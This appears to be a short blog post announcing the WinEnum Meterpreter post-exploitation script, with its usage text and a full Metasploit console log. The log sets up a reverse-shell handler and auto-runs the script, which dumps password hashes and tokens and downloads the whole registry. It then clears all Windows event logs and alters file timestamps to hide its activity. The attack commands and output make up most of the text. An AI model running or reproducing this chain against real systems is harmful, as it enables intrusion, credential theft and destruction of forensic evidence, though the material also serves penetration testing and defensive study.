Finally got the script to work with AutoRunScript in Meterpreter, plus added automatic process migration for client side exploits where the program holding the meterpreter session is closed.
http://www.darkoperator.com/winenum.tar.gz
meterpreter > run winenum -h
Windows Local Enumerion Meterpreter Script by Darkoperator
Carlos Perez carlos_perez@darkoperator.com
Usage:
-h This help message.
-m Migrates the Meterpreter Session from it current process to a new one
-c Changes Access Time, Modified Time and Created Time of executables
that where run on the target machine and clear the EventLog
-r Dumps, compresses and download entire Registry
resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 192.168.1.108
LHOST => 192.168.1.108
resource> set LPORT 4444
LPORT => 4444
resource> set AutoRunScript /msf3/scripts/meterpreter/winenumng.rb -r -m -c
AutoRunScript => /msf3/scripts/meterpreter/winenumng.rb -r -m -c
resource> exploit
[*] Handler binding to LHOST 192.168.1.108
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Launching hidden cmd.exe...
[*] Process 3672 created.
[*] Current process is grinder.exe (1988). Migrating to 3672.
[*] Migration completed successfully.
[*] New server process: cmd.exe (3672)
[*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
[*] New session on 192.168.1.147:1079...
[*] Saving report to /tmp/192.168.1.147_20081222.441181627
[*] Checking if WIN2K301 is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] This is a VMWare virtual Machine
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -na
[*] running command netstat -ns
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net localgroup
[*] running command net view /domain
[*] running command netsh firewall show config
[*] running command tasklist /svc
[*] Running WMIC Commands ....
[*] running command wimic computersystem list
[*] running command wimic useraccount list
[*] running command wimic group
[*] running command wimic service list brief
[*] running command wimic volume list brief
[*] running command wimic process list brief
[*] running command wimic startup list full
[*] running command wimic qfe
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Dumping and Downloading the Registry
[*] Exporting HKCU
[*] Compressing HKCU into cab file for faster download
[*] Exporting HKLM
[*] Compressing HKLM into cab file for faster download
[*] Exporting HKCC
[*] Compressing HKCC into cab file for faster download
[*] Exporting HKCR
[*] Compressing HKCR into cab file for faster download
[*] Exporting HKU
[*] Compressing HKU into cab file for faster download
[*] Downloading HKCU.cab to -> /tmp/192.168.1.147-HKCU.cab
[*] Downloading HKLM.cab to -> /tmp/192.168.1.147-HKLM.cab
[*] Downloading HKCC.cab to -> /tmp/192.168.1.147-HKCC.cab
[*] Downloading HKCR.cab to -> /tmp/192.168.1.147-HKCR.cab
[*] Downloading HKU.cab to -> /tmp/192.168.1.147-HKU.cab
[*] Deleting left over files
[*] Clearing Event Logs, this will leave and event 517
[*] Clearing the security Event Log
[*] Clearing the system Event Log
[*] Clearing the application Event Log
[*] Clearing the directory service Event Log
[*] Clearing the dns server Event Log
[*] Clearing the file replication service Event Log
[*] Alll Event Logs have been cleared
[*] Changing Access Time, Modified Time and Created Time of Files Used
[*] Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\route.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\net.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
[*] Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe
[*] Done!
[*] Meterpreter session 1 opened (192.168.1.108:4444 -> 192.168.1.147:1079)
meterpreter >